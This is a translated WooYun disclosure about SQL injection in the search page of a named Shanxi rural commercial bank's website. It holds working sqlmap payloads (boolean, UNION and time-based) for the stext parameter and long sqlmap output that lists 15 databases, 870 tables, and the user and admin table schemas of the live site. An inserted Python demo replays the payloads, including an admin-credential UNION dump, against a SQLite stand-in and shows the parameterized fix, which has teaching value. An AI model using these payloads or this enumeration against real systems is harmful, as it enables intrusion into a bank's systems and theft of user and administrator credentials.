Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0143214

Title: SQL injection in the official website of a rural commercial bank in Shanxi leaks sensitive information from 15 databases and over a thousand tables (Part 1)

Related vendor: cncert国家互联网应急中心 (CNCERT, National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-09-25 11:34

Fix time: 2015-11-14 09:04

Disclosed: 2015-11-14 09:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (cncert国家互联网应急中心) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-09-25: Details sent to the vendor, awaiting vendor handling
2015-09-30: cncert国家互联网应急中心 was unable to reach the affected unit; details disclosed only to the reporting agency
2015-10-10: Details disclosed to core white hats and domain experts
2015-10-20: Details disclosed to regular white hats
2015-10-30: Details disclosed to intern white hats
2015-11-14: Details disclosed to the public

Brief description:

More WooYun, more opportunities...

Detailed description:

The main site of Zezhou Rural Commercial Bank (http://www.zrcbank.top) has an SQL injection that exposes sensitive information in 15 databases and more than 1000 tables...

Proof of vulnerability:

Main site of Zezhou Rural Commercial Bank: http://www.zrcbank.top

[Screenshot: 1主页面.png (homepage)]


Injectable page: http://www.zrcbank.top/group/1search.php
Entering aaa' in the search box and clicking Search makes the application return an SQL warning.

[Screenshot: 输入aaa报错了.png (error returned after entering aaa')]


That points at the stext parameter as the likely injection point.

[Screenshot: 报错了.png (SQL error message)]


Testing with sqlmap confirms the injection; it finds three working techniques against stext:

sqlmap identified the following injection points with a total of 83 HTTP(s) requests:
---
Place: GET
Parameter: stext
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: stext=-5119' OR (9907=9907)#
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: stext=aaa' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7166757271,0x6745674350634e746f47,0x716f687071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: stext=aaa' AND 2871=BENCHMARK(5000000,MD5(0x564b7354)) AND 'TSje'='TSje
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
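The three payloads above, as an added example that is not part of the original report: the UNION payload's hex literals decode to the marker string sqlmap searches for in the HTTP response (the NULLs pad the injected SELECT to the 14 columns of the original query); the boolean payload closes the quoted string and appends OR (9907=9907), turning the WHERE clause into a tautology; the time-based payload makes MySQL compute 5,000,000 MD5 hashes so the response arrives measurably late. The script decodes the markers and counts the columns from the payload text verbatim, then replays the boolean and UNION tricks against an in-memory SQLite stand-in for the 1search.php query to show how the same hole reads zhk_admin, next to the parameterized query that closes it. The news table, its rows and the admin row are constructed; SQLite uses "-- " rather than MySQL's "#" as the line comment, so the replayed payloads are adjusted accordingly.

```python
"""
Added example (not from the original report): what the three sqlmap payloads
do, replayed against an in-memory SQLite stand-in for the 1search.php query.
The news table (id, title) and its rows are invented; zhk_admin and its
username/password columns come from the report, the stored row is constructed.
The report's payloads end in '#', MySQL's single-line comment; SQLite only
understands '-- ', so the replayed payloads use that instead.
"""
import sqlite3

# The UNION payload exactly as sqlmap printed it in the report.
UNION_PAYLOAD = (
    "stext=aaa' UNION ALL SELECT NULL,NULL,NULL,"
    "CONCAT(0x7166757271,0x6745674350634e746f47,0x716f687071),"
    "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#"
)


def decode_mysql_hex_literal(literal: str) -> str:
    """MySQL treats 0x... as a binary string; decoding shows the text."""
    return bytes.fromhex(literal[2:]).decode("ascii")


def union_marker() -> str:
    """Value produced by the CONCAT(...) in the payload.

    sqlmap wraps a random token between two fixed markers and then looks for
    the combined string in the response; finding it proves the injected
    column is reflected in the page.
    """
    return "".join(
        decode_mysql_hex_literal(h)
        for h in ("0x7166757271", "0x6745674350634e746f47", "0x716f687071")
    )


def count_union_columns(payload: str) -> int:
    """Number of columns sqlmap had to match in the original SELECT (14 here)."""
    select_list = payload.split("UNION ALL SELECT", 1)[1].rstrip("#")
    depth, columns = 0, 1
    for ch in select_list:  # count commas at nesting depth 0 only,
        if ch == "(":       # so the commas inside CONCAT(...) are ignored
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            columns += 1
    return columns


def build_demo_db() -> sqlite3.Connection:
    """Constructed data: a searchable news table and an admin table like zhk_admin."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'branch opening hours'), (2, 'new deposit product');
        CREATE TABLE zhk_admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO zhk_admin VALUES (1, 'admin', 'demo-plaintext-pw');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, stext: str) -> list:
    """The pattern the SQL warning implies: stext spliced into the SQL text."""
    sql = f"SELECT id, title FROM news WHERE title LIKE '%{stext}%'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, stext: str) -> list:
    """The fix: stext travels as a bound parameter, never as SQL."""
    sql = "SELECT id, title FROM news WHERE title LIKE ?"
    return conn.execute(sql, (f"%{stext}%",)).fetchall()


# Report payloads with MySQL's '#' swapped for SQLite's '-- ' comment.
BOOLEAN_PAYLOAD = "-5119' OR (9907=9907)-- "
# Same UNION trick, reading the admin table instead of sqlmap's marker;
# two columns, matching the two the vulnerable SELECT returns.
UNION_DUMP_PAYLOAD = "aaa' UNION ALL SELECT username, password FROM zhk_admin-- "

if __name__ == "__main__":
    db = build_demo_db()
    print("marker sqlmap looks for:", union_marker())
    print("columns in UNION payload:", count_union_columns(UNION_PAYLOAD))
    print("vulnerable, boolean payload:", search_vulnerable(db, BOOLEAN_PAYLOAD))
    print("vulnerable, union dump:", search_vulnerable(db, UNION_DUMP_PAYLOAD))
    print("parameterized, union dump:", search_parameterized(db, UNION_DUMP_PAYLOAD))
```

The boolean payload returns every row of the searched table (the original search for "aaa" returns none), and the UNION payload returns the admin row from a table the search page was never meant to touch; the parameterized version returns nothing for either, because the quote and comment characters are just bytes inside a LIKE pattern.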


15 databases in total:

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
available databases [15]:
[*] apermin0320
[*] biweb
[*] cms1
[*] dedecmsv57gbksp1
[*] freecken
[*] hiked
[*] information_schema
[*] lanhuah
[*] mysql
[*] sjyrw
[*] test
[*] w7ims
[*] wechat
[*] zrcbank
[*] zrcmall


The current database is apermin0320:

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
current database: 'apermin0320'


The apermin0320 database holds 870 tables (that's a lot of data!):

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
Database: apermin0320
[870 tables]
+--------------------------------------+
| update |
| user |
| accessbank |
| accessprepay |
| accesspreshou |
| accesstype |
| affair |
| bank |
| bankzhuru |
| buyplanmain |
| buyplanmain_detail |
| buyplanmain_detail_color |
| buyplanmain_mingxi |
| buyplanmain_tmp_color |
| buyplanstate |
| calendar |
| calendar_type |
| callchuli |
| callertype |
| calltype |
| certificate |
| certificatetype |
| commlog |
| competeproduct |
| contact |
| contract_flag |
| crm_chance |
| crm_chance_rate |
| crm_contact |
| crm_customer_move |
| crm_dict_servicesources |
| crm_dict_servicestatus |
| crm_dict_servicetypes |
| crm_feiyong_sq |
| crm_finishstate |
| crm_jieduan |
| crm_mytable |
| crm_mytable_notes |
| crm_mytable_wz |
| crm_mytable_xssx |
| crm_piaoju_type |
| crm_remember |
| crm_service |
| crm_shenhezhuangtai |
| crm_shenqingbaobei |
| crm_zhuangtai |
| customer |
| customer_fangan |
| customer_xuqiu |
| customerarea |
| customerbelong |
| customerdefinetype |
| customerlever |
| customerorigin |
| customerproduct |
| customerproduct_detail |
| customs_ranking_list |
| department |
| dict_countrycode |
| dict_danyuanyongtu |
| dict_danyuanzhuangtai |
| dict_education |
| dict_huxing |
| dict_notify |
| dict_satisfaction |
| dict_shiyongleixing |
| dict_weekday |
| dict_xingbie |
| dict_xingzheng_qingjia |
| dict_zhengjianleixing |
| dorm_area |
| dorm_building |
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_affiliate_log |
| ecs_agency |
| ecs_area_region |
| ecs_article |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cart_combo |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_commission |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_gallery |
| ecs_goods_type |
| ecs_group_goods |
| ecs_keywords |
| ecs_link_goods |
| ecs_mail_templates |
| ecs_member_price |
| ecs_nav |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_pack |
| ecs_package_goods |
| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_products |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_searchengine |
| ecs_seller_category |
| ecs_seller_extend_info |
| ecs_seller_fields |
| ecs_seller_nav |
| ecs_seller_shopbg |
| ecs_seller_shopheader |
| ecs_seller_shopinfo |
| ecs_seller_shopslide |
| ecs_seller_shopwindow |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_store_category |
| ecs_street_tags |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_touch_activity |
| ecs_touch_ad |
| ecs_touch_ad_position |
| ecs_touch_article |
| ecs_touch_article_cat |
| ecs_touch_auth |
| ecs_touch_brand |
| ecs_touch_category |
| ecs_touch_feedback |
| ecs_touch_goods |
| ecs_touch_goods_activity |
| ecs_touch_nav |
| ecs_touch_payment |
| ecs_touch_shop_config |
| ecs_touch_user_info |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_feed |
| ecs_user_rank |
| ecs_user_seller |
| ecs_users |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wechat |
| ecs_wechat_custom_message |
| ecs_wechat_extend |
| ecs_wechat_mass_history |
| ecs_wechat_media |
| ecs_wechat_menu |
| ecs_wechat_point |
| ecs_wechat_prize |
| ecs_wechat_qrcode |
| ecs_wechat_reply |
| ecs_wechat_rule_keywords |
| ecs_wechat_user |
| ecs_wechat_user_group |
| ecs_weixin_bonus |
| ecs_weixin_cfg |
| ecs_weixin_config |
| ecs_weixin_keywords |
| ecs_weixin_lang |
| ecs_weixin_menu |
| ecs_weixin_point |
| ecs_weixin_point_record |
| ecs_weixin_user |
| ecs_wholesale |
| email |
| emailstate |
| exchange |
| fahuodan |
| fahuodan_detail |
| fahuostate |
| fahuotype |
| feiyongclass |
| feiyongrecord |
| feiyongtype |
| fixedasset |
| fixedassetbaofei |
| fixedassetgroup |
| fixedassetin |
| fixedassetleibie |
| fixedassetout |
| fixedassetstatus |
| fixedassettiaoku |
| fixedassettui |
| fixedassetweixiu |
| fukuanplan |
| fukuanrecord |
| gb_marriage |
| gb_national |
| gb_political |
| gb_sex |
| hk_cityclass |
| hk_deal |
| hk_deal_item |
| hk_deal_log |
| hk_delivery |
| hk_delivery_notice |
| hk_goods |
| hk_goodsclass |
| hk_hoteluser |
| hk_mobilecode |
| hk_payment |
| hk_payment_form |
| hk_payment_notice |
| hk_region |
| hk_search_user |
| hk_user |
| hk_useraddress |
| hk_work |
| hkfood_admin |
| hkfood_cityclass |
| hkfood_deal |
| hkfood_deal_item |
| hkfood_deal_short_copy |
| hkfood_goods |
| hkfood_shop |
| hkfood_shopadmin |
| hrms_boolean |
| hrms_educationalexperience |
| hrms_expense |
| hrms_expense_type |
| hrms_file |
| hrms_file_fuzhi |
| hrms_file_lizhi |
| hrms_file_luyong |
| hrms_laboringskill |
| hrms_r_p |
| hrms_r_p_name |
| hrms_r_p_status |
| hrms_reward_punishment |
| hrms_socialrelation |
| hrms_transfer |
| hrms_transfer_type |
| hrms_work_status |
| hrms_worker_hetong |
| hrms_worker_zhengzhao |
| hrms_worker_zhicheng |
| hrms_workexperience |
| hrms_zhiwei_status |
| hrms_zpjihua |
| hrms_zprencaiku |
| huikuanplan |
| huikuanrecord |
| ifneed |
| important |
| ims_activity |
| ims_activity_day |
| ims_activity_guest |
| ims_activity_mail |
| ims_activity_note |
| ims_activity_reply |
| ims_activity_user |
| ims_article |
| ims_article_category |
| ims_article_reply |
| ims_attachment |
| ims_award |
| ims_award_list |
| ims_baoming_list |
| ims_baoming_reply |
| ims_basic_reply |
| ims_bigpan_award |
| ims_bigpan_reply |
| ims_bigpan_winner |
| ims_bigwheel_award |
| ims_bigwheel_fans |
| ims_bigwheel_reply |
| ims_bless_card |
| ims_bless_reply |
| ims_business |
| ims_cache |
| ims_card |
| ims_card_coupon |
| ims_card_log |
| ims_card_members |
| ims_card_members_coupon |
| ims_card_password |
| ims_chengji |
| ims_community_admap |
| ims_community_advertisement |
| ims_community_announcement |
| ims_community_express_company |
| ims_community_express_fee |
| ims_community_express_order |
| ims_community_manager |
| ims_community_member |
| ims_community_phone |
| ims_community_region |
| ims_community_reply |
| ims_community_report |
| ims_community_service |
| ims_community_servicecategory |
| ims_community_verifycode |
| ims_cover_reply |
| ims_credit_log |
| ims_credit_request |
| ims_cyd_award |
| ims_cyd_reply |
| ims_cyd_winner |
| ims_default_reply_log |
| ims_dqq_award |
| ims_dqq_reply |
| ims_dqq_winner |
| ims_duanwu_dianzan |
| ims_duanwu_fans |
| ims_duanwu_show |
| ims_egg_award |
| ims_egg_reply |
| ims_egg_winner |
| ims_exam_choice |
| ims_exam_desc |
| ims_exam_paper |
| ims_fans |
| ims_fans_2 |
| ims_fuli |
| ims_fuli_reply |
| ims_fuli_rows |
| ims_game |
| ims_game2048_reply |
| ims_game_category |
| ims_game_img |
| ims_groupon_fans |
| ims_groupon_list |
| ims_groupon_order |
| ims_groupon_set |
| ims_hlzonyu_data |
| ims_hlzonyu_list |
| ims_hlzonyu_log |
| ims_hlzonyu_order |
| ims_hlzonyu_reply |
| ims_hotel2 |
| ims_hotel2_brand |
| ims_hotel2_business |
| ims_hotel2_member |
| ims_hotel2_order |
| ims_hotel2_reply |
| ims_hotel2_room |
| ims_hotel2_room_price |
| ims_hotel2_set |
| ims_hotel_order |
| ims_hotel_reply |
| ims_hotel_shop |
| ims_huabao |
| ims_huabao_item |
| ims_huabao_photo |
| ims_huabao_reply |
| ims_icard2_announce |
| ims_icard2_business |
| ims_icard2_card |
| ims_icard2_card_log |
| ims_icard2_coupon |
| ims_icard2_gift |
| ims_icard2_level |
| ims_icard2_money_log |
| ims_icard2_order |
| ims_icard2_outlet |
| ims_icard2_privilege |
| ims_icard2_reply |
| ims_icard2_score |
| ims_icard2_sign |
| ims_icard2_sncode |
| ims_icard2_style |
| ims_icard2_user |
| ims_icard_announce |
| ims_icard_business |
| ims_icard_card |
| ims_icard_card_log |
| ims_icard_coupon |
| ims_icard_gift |
| ims_icard_level |
| ims_icard_money_log |
| ims_icard_order |
| ims_icard_outlet |
| ims_icard_privilege |
| ims_icard_reply |
| ims_icard_score |
| ims_icard_sign |
| ims_icard_sncode |
| ims_icard_style |
| ims_icard_user |
| ims_idish_area |
| ims_idish_cart |
| ims_idish_category |
| ims_idish_email_setting |
| ims_idish_goods |
| ims_idish_intelligent |
| ims_idish_nave |
| ims_idish_order |
| ims_idish_order_goods |
| ims_idish_print_setting |
| ims_idish_reply |
| ims_idish_setting |
| ims_idish_sms_setting |
| ims_idish_store_setting |
| ims_idish_stores |
| ims_ifans_groupsend |
| ims_ishopping_address |
| ims_ishopping_cart |
| ims_ishopping_category |
| ims_ishopping_goods |
| ims_ishopping_order |
| ims_ishopping_order_goods |
| ims_ishopping_setting |
| ims_izc_lightbox_app |
| ims_izc_lightbox_book |
| ims_izc_lightbox_comment |
| ims_izc_lightbox_list |
| ims_izc_lightbox_manage |
| ims_izc_lightbox_page |
| ims_izc_lightbox_reply |
| ims_izclightbox_items |
| ims_izclightbox_list |
| ims_izclightbox_reply |
| ims_jdg_pub |
| ims_jdg_pub_chatcomments |
| ims_jdg_pub_chatfans |
| ims_jdg_pub_clock |
| ims_jdg_pub_party |
| ims_jdg_pub_partycomments |
| ims_jdg_pub_partyfans |
| ims_jdg_pub_photos |
| ims_jdg_pub_photoslikeit |
| ims_jdg_pub_rule |
| ims_jdg_pub_wineadmin |
| ims_jdg_pub_winelog |
| ims_lxy_bigpan_award |
| ims_lxy_bigpan_reply |
| ims_lxy_bigpan_winner |
| ims_lxy_bussiness_card |
| ims_lxy_bussiness_card_class |
| ims_lxy_bussiness_card_cop |
| ims_lxy_bussiness_card_reply |
| ims_lxy_bussiness_per_card |
| ims_lxy_bussiness_per_card_class |
| ims_lxy_bussiness_per_card_cop |
| ims_lxy_bussiness_per_card_product |
| ims_lxy_bussiness_per_card_reply |
| ims_lxy_ecowzp |
| ims_lxy_ecowzp_list_add |
| ims_lxy_ecowzp_order |
| ims_lxy_ecowzp_reply |
| ims_lxy_marry_info |
| ims_lxy_marry_list |
| ims_lxy_marry_reply |
| ims_lxy_wecs |
| ims_lxy_wecs2 |
| ims_lxy_wecs3 |
| ims_mailbox_list |
| ims_mailbox_reply |
| ims_mechat |
| ims_medias |
| ims_members |
| ims_members_group |
| ims_members_paylog |
| ims_members_permission |
| ims_members_profile |
| ims_members_status |
| ims_menu_event |
| ims_message_list |
| ims_message_reply |
| ims_modules |
| ims_modules_bindings |
| ims_msg |
| ims_msg_reply |
| ims_multisearch |
| ims_multisearch_fields |
| ims_multisearch_reply |
| ims_multisearch_research |
| ims_music_reply |
| ims_news_reply |
| ims_nowbig_reply |
| ims_nowbig_user |
| ims_nuqut_reply |
| ims_oauther |
| ims_oerrorlog |
| ims_ohost |
| ims_paylog |
| ims_profile_fields |
| ims_qrcode |
| ims_qrcode_stat |
| ims_quickexam2_choice |
| ims_quickexam2_paper |
| ims_quickexam2_reply |
| ims_quickexam2_score_record |
| ims_quickmusic_music |
| ims_quickmusic_reply |
| ims_quickmusic_tape |
| ims_quicksurvay_choice |
| ims_quicksurvay_paper |
| ims_quicksurvay_reply |
| ims_quicksurvay_score_record |
| ims_redpacket |
| ims_redpacket_award |
| ims_redpacket_firend |
| ims_redpacket_reply |
| ims_redpacket_setting |
| ims_redpacket_token |
| ims_redpacket_user |
| ims_research |
| ims_research_data |
| ims_research_fields |
| ims_research_reply |
| ims_research_rows |
| ims_rule |
| ims_rule_keyword |
| ims_school |
| ims_school_class |
| ims_school_notice |
| ims_school_score |
| ims_school_set |
| ims_school_student |
| ims_school_teacher |
| ims_scratchcard_award |
| ims_scratchcard_reply |
| ims_scratchcard_winner |
| ims_security_reply |
| ims_security_winner |
| ims_sessions |
| ims_settings |
| ims_shake_member |
| ims_shake_reply |
| ims_sharecards_category |
| ims_sharecards_date |
| ims_sharecards_reply |
| ims_sheka_list |
| ims_sheka_reply |
| ims_sheka_zhufu |
| ims_shopping2_address |
| ims_shopping2_cart |
| ims_shopping2_category |
| ims_shopping2_express |
| ims_shopping2_fans |
| ims_shopping2_goods |
| ims_shopping2_order |
| ims_shopping2_order_goods |
| ims_shopping2_set |
| ims_shopping3_address |
| ims_shopping3_cart |
| ims_shopping3_category |
| ims_shopping3_express |
| ims_shopping3_fans |
| ims_shopping3_fans_like |
| ims_shopping3_genius |
| ims_shopping3_goods |
| ims_shopping3_order |
| ims_shopping3_order_goods |
| ims_shopping3_set |
| ims_shopping_address |
| ims_shopping_adv |
| ims_shopping_cart |
| ims_shopping_category |
| ims_shopping_dispatch |
| ims_shopping_express |
| ims_shopping_feedback |
| ims_shopping_goods |
| ims_shopping_goods_option |
| ims_shopping_goods_param |
| ims_shopping_order |
| ims_shopping_order_goods |
| ims_shopping_product |
| ims_shopping_set |
| ims_shopping_spec |
| ims_shopping_spec_item |
| ims_signup |
| ims_signup_data |
| ims_signup_fields |
| ims_signup_reply |
| ims_signup_rows |
| ims_site_nav |
| ims_site_slide |
| ims_site_styles |
| ims_site_templates |
| ims_smashegg_fans |
| ims_smashegg_reply |
| ims_sns |
| ims_sns_post |
| ims_sns_reply |
| ims_stat_keyword |
| ims_stat_msg_history |
| ims_stat_rule |
| ims_stonefish_chailihe_data |
| ims_stonefish_chailihe_gift |
| ims_stonefish_chailihe_reply |
| ims_stonefish_chailihe_userlist |
| ims_stonefish_grabgifts_awarding |
| ims_stonefish_grabgifts_awardingtype |
| ims_stonefish_grabgifts_data |
| ims_stonefish_grabgifts_gift |
| ims_stonefish_grabgifts_giftmika |
| ims_stonefish_grabgifts_reply |
| ims_stonefish_grabgifts_userlist |
| ims_tnhy_reply |
| ims_userapi_cache |
| ims_userapi_reply |
| ims_vote_fans |
| ims_vote_option |
| ims_vote_reply |
| ims_votes_fans |
| ims_votes_option |
| ims_votes_reply |
| ims_wcha_reply |
| ims_wechats |
| ims_wechats_modules |
| ims_weidim_item |
| ims_weidim_order |
| ims_weidim_reply |
| ims_weihaomwb_reply |
| ims_weihaomwb_user |
| ims_weishare |
| ims_weishare2 |
| ims_weishare2_firend |
| ims_weishare2_reply |
| ims_weishare2_setting |
| ims_weishare2_user |
| ims_weishare_firend |
| ims_weishare_reply |
| ims_weishare_setting |
| ims_weishare_user |
| ims_weivote_log |
| ims_weivote_option |
| ims_weivote_setting |
| ims_wish |
| ims_xcommunity_activity |
| ims_xcommunity_admap |
| ims_xcommunity_advertisement |
| ims_xcommunity_announcement |
| ims_xcommunity_carpool |
| ims_xcommunity_fled |
| ims_xcommunity_manager |
| ims_xcommunity_member |
| ims_xcommunity_navextension |
| ims_xcommunity_phone |
| ims_xcommunity_property |
| ims_xcommunity_region |
| ims_xcommunity_reply |
| ims_xcommunity_report |
| ims_xcommunity_res |
| ims_xcommunity_search |
| ims_xcommunity_service |
| ims_xcommunity_servicecategory |
| ims_xcommunity_set |
| ims_xcommunity_slide |
| ims_xcommunity_verifycode |
| ims_xhw_picvote |
| ims_xhw_picvote_log |
| ims_xhw_picvote_reg |
| ims_xhw_picvote_setting |
| ims_yoby_kehu |
| ims_yoby_xiangmu |
| ims_yqs_award |
| ims_yqs_reply |
| ims_yqs_winner |
| ims_yyy_reply |
| ims_yyy_winner |
| ims_yyyonline_reply |
| ims_yyyonline_winner |
| info |
| inorout |
| kaipiaorecord |
| kaipiaostate |
| linkman |
| measure |
| menu |
| message |
| modifyrecord |
| notify |
| numzero |
| office_task |
| officeguihuanstate |
| officeproduct |
| officeproductbaofei |
| officeproductcangku |
| officeproductgroup |
| officeproductin |
| officeproductleibie |
| officeproductout |
| officeproducttiaoku |
| officeproducttui |
| paystate |
| phpshe_ad |
| phpshe_admin |
| phpshe_article |
| phpshe_ask |
| phpshe_cart |
| phpshe_category |
| phpshe_class |
| phpshe_collect |
| phpshe_comment |
| phpshe_link |
| phpshe_order |
| phpshe_orderdata |
| phpshe_page |
| phpshe_payway |
| phpshe_product |
| phpshe_setting |
| phpshe_user |
| product |
| productcolor |
| producttype |
| productzuzhuang |
| productzuzhuang2_detail |
| productzuzhuang_detail |
| productzuzhuangstate |
| property |
| salemode |
| salseman_ranking_list |
| sellbilltype |
| sellcontract_jiaofu |
| sellplanmain |
| sellplanmain_detail |
| sellplanmain_detail_color |
| sellplanstate |
| shoupiaorecord |
| sms_sendlist |
| ssu_loginadmin |
| ssu_shopplay |
| ssu_shopuser |
| ssu_shopuser_copy |
| ssu_shopuser_copy1 |
| ssu_shopuser_youchu |
| ssu_shopvip |
| ssu_shopvip_youchu |
| stock |
| stockchangemain |
| stockchangemain_detail |
| stockchangestate |
| stockinmain |
| stockinmain_detail |
| stockinmain_detail_color |
| stockinmain_view |
| stockoutmain |
| stockoutmain_detail |
| stockoutmain_detail_color |
| stockoutmain_view |
| store |
| store_color |
| store_init |
| store_product |
| storeaccesstype |
| storecheck |
| storecheck_detail |
| supply |
| supplylever |
| supplylinkman |
| supplyproduct |
| sys_code |
| sys_function |
| sys_menu |
| system_log |
| system_logall |
| system_logtype |
| systemconfig |
| systemhelp |
| systemlang |
| systemprivate |
| systemprivateconfig |
| systemprivateinc |
| systemtable |
| test |
| tys_admin |
| tys_baozhuang |
| tys_car |
| tys_company |
| tys_danjiatype |
| tys_daozhan |
| tys_guige |
| tys_hetong |
| tys_hetong_detail |
| tys_pinming |
| tys_shangbiao |
| tys_shouhuo |
| tys_tielu |
| tys_xufang |
| tys_zhantai |
| tys_zhiliang |
| unit |
| unitprop |
| user_priv |
| v_accessbank |
| v_accessprepay |
| v_accesspreshou |
| v_bankzhurutype |
| v_buyplanmain_detail |
| v_feiyong_sq |
| v_feiyongbaoxiao |
| v_feiyongclass |
| v_feiyongrecord |
| v_feiyongtype |
| v_sellcontract |
| v_sellcontract_plan |
| v_sellone |
| v_sellonedetail |
| v_sellplanmain_detail |
| v_shouruclass |
| v_shoururecord |
| v_shourutype |
| v_supplyownmoney |
| v_workplanmain_detail |
| v_yingkaipiaohuizong |
| v_yingshoukuanhuizong |
| vip |
| w |
| workplanmain |
| workplanmain_detail |
| workplanshenhe |
| workplanstate |
| workreport |
| wygl_baoxiuxinxi |
| wygl_biaoxiuxiangmu |
| wygl_gongchenghetong |
| wygl_gongchengjindu |
| wygl_gongchengxinxi |
| wygl_pingjialeixing |
| wygl_weixiupingjia |
| yunfeitype |
| zhk_admin |
| zhk_city |
| zhk_content |
| zhk_content_zrc |
| zhk_ddz_cc |
| zhk_ddz_cc_copy |
| zhk_ddz_user |
| zhk_ddz_user2 |
| zhk_picture |
+--------------------------------------+


Let's look at a few of the tables. The user table:
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
Database: apermin0320
Table: user
[83 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| ADD_HOME | varchar(200) |
| AUTHORIZE | int(11) |
| AVATAR | varchar(20) |
| BBS_COUNTER | int(11) |
| BBS_SIGNATURE | text |
| BIND_IP | text |
| BIRTHDAY | date |
| BKGROUND | text |
| BP_NO | varchar(50) |
| BYNAME | varchar(20) |
| CALL_SOUND | char(2) |
| CANBROADCAST | int(11) |
| CONCERN_USER | text |
| DEPT_ID | int(11) |
| DEPT_ID_OTHER | text |
| DISABLED | int(11) |
| DUTY_TYPE | int(11) |
| EMAIL | varchar(50) |
| EMAIL_CAPACITY | int(11) |
| EmailAddress | varchar(100) |
| EmailPassword | varchar(100) |
| FAX_NO_DEPT | varchar(50) |
| FOLDER_CAPACITY | int(11) |
| FUNC_ID_STR | varchar(1000) |
| ICQ_NO | varchar(50) |
| IS_LUNAR | char(1) |
| KEY_SN | varchar(100) |
| LAST_PASS_TIME | datetime |
| LAST_VISIT_IP | varchar(100) |
| LAST_VISIT_TIME | datetime |
| leftmenu | varchar(50) |
| LIMIT_LOGIN | char(1) |
| MENU_EXPAND | char(2) |
| MENU_IMAGE | varchar(20) |
| MENU_TYPE | char(1) |
| MOBIL_NO | varchar(50) |
| MOBIL_NO_HIDDEN | char(1) |
| MOBILE_PS1 | varchar(50) |
| MOBILE_PS2 | varchar(50) |
| MOBILE_SP | varchar(50) |
| MSN | varchar(200) |
| MY_RSS | text |
| MY_STATUS | varchar(200) |
| MYTABLE_LEFT | varchar(200) |
| MYTABLE_RIGHT | varchar(200) |
| NICK_NAME | varchar(50) |
| NOT_LOGIN | varchar(20) |
| NOT_VIEW_TABLE | varchar(20) |
| NOT_VIEW_USER | varchar(20) |
| OICQ_NO | varchar(50) |
| ON_STATUS | char(1) |
| ONLINE | int(11) |
| PANEL | char(1) |
| PASSWORD | varchar(50) |
| PIC_ID | int(10) unsigned |
| POST_DEPT | text |
| POST_NO_HOME | varchar(50) |
| POST_PRIV | varchar(50) |
| REMARK | text |
| rightmenu | varchar(50) |
| SCORE | int(11) |
| SECURE_KEY_SN | varchar(20) |
| SEX | char(1) |
| SHORTCUT | text |
| SHOW_RSS | char(1) |
| SMS_ON | char(1) |
| SMTPServerIP | varchar(100) |
| TDER_FLAG | char(1) |
| TEL_NO_DEPT | varchar(50) |
| TEL_NO_HOME | varchar(50) |
| THEME | varchar(10) |
| UID | int(11) |
| UIN | int(10) unsigned |
| USEING_KEY | char(2) |
| USER_DEFINE | text |
| USER_ID | varchar(20) |
| USER_NAME | varchar(200) |
| USER_NO | int(11) |
| USER_PRIV | varchar(10) |
| USER_PRIV_OTHER | text |
| WEATHER_CITY | varchar(20) |
| WEBMAIL_CAPACITY | int(11) |
| WEBMAIL_NUM | int(11) |
+------------------+------------------+
The connection was slow and there was too much data, so I didn't finish dumping it... the user table is quite rich too.
Now the zhk_admin table, which should be the admin table:

Database: apermin0320
Table: zhk_admin
[3 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| id | int(10) unsigned |
| password | varchar(500) |
| username | varchar(500) |
